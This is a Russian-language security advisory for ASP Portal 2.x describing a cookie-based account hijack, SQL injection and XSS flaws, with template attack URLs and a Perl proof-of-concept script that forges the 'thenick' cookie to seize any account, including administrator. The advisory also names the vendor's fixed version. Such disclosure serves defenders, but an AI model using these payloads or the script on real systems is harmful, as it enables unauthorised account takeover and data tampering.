Дата публикации: | 17.02.2004 |
Дата изменения: | 03.12.2008 |
Всего просмотров: | 2178 |
Опасность: | Высокая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Неавторизованное изменение данных Обход ограничений безопасности |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | ASP Portal 2.x |
Уязвимые версии: ASP Portal
Описание: Несколько уязвимостей обнаружено в ASP Portal. Удаленный пользователь может внедрить SQL команды и может внедриться в учетную запись пользователя. Удаленный пользователь может выполнить XSS нападение. 1. Удаленный пользователь может изменить значение 'thenick' куки, чтобы получить доступ к учетной записи целевого пользователя, включая учетную запись администратора. Эскплоит ниже. 2. sql инъекция: http://[target]/index.asp?inc=blog&pageid='[SqlQ uery] http://[target]/index.asp?inc=downloadssub&downloadscat='[SqlQuery] GET http://localhost/index.asp HTTP/1.1 Cookie: thenick='[SqlQuery]3. XSS http://[target]/index.asp?inc=' >[XSS] http://[target]/index.asp?inc=profile&searchtext='>[XSS] http://[target]/index.asp?inc=forumread&article='>[XSS] Пример/Эксплоит: #!/usr/bin/perl -w ## PROOF OF CONCEPT COOKIE ACCOUNT HIJACK ## Example: Asp-POC.pl localhost portal/index.asp Admin respuesta.htm use IO::Socket; if (@ARGV < 4) print "\n\n"; print " ____________________________________________________________ \n"; print "| |\n"; print "| PROOF OF CONCEPT COOKIE ACCOUNT HIJACK |\n"; print "| Usage:Asp-POC.pl [host] [directorio] [usuario] [fichero] |\n"; print "| |\n"; print "| By: Manuel López #IST |\n"; print "|____________________________________________________________|\n"; print "\n\n"; exit(1); $host = $ARGV[0]; $directorio = $ARGV[1]; $usuario = $ARGV[2]; $fichero = $ARGV[3]; print "\n"; print "----- Conectando <----\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",PeerPort => "80") || die "$socket error $!"; print "====> Conectado\n"; print "====> Enviando Datos\n"; $socket->print(<<taqui) or die "write: $!"; GET http://$host/$directorio HTTP/1.1 Cookie: thenick=$usuario taqui print "====> OK\n"; print "====> Generando $fichero ...\n"; open( Result, ">$fichero"); print Result while <$socket>; close Result; URL производителя: http://www.aspportal.net/ Решение:Установите обновленную версию портала: http://www.aspportal.net/downloadsviewer.asp?theurl=38 |
|
Ссылки: | ASP Portal Multiple Vulnerabilities |
|
http://www.aspportal.net/index.asp?inc=newsread&article=91 |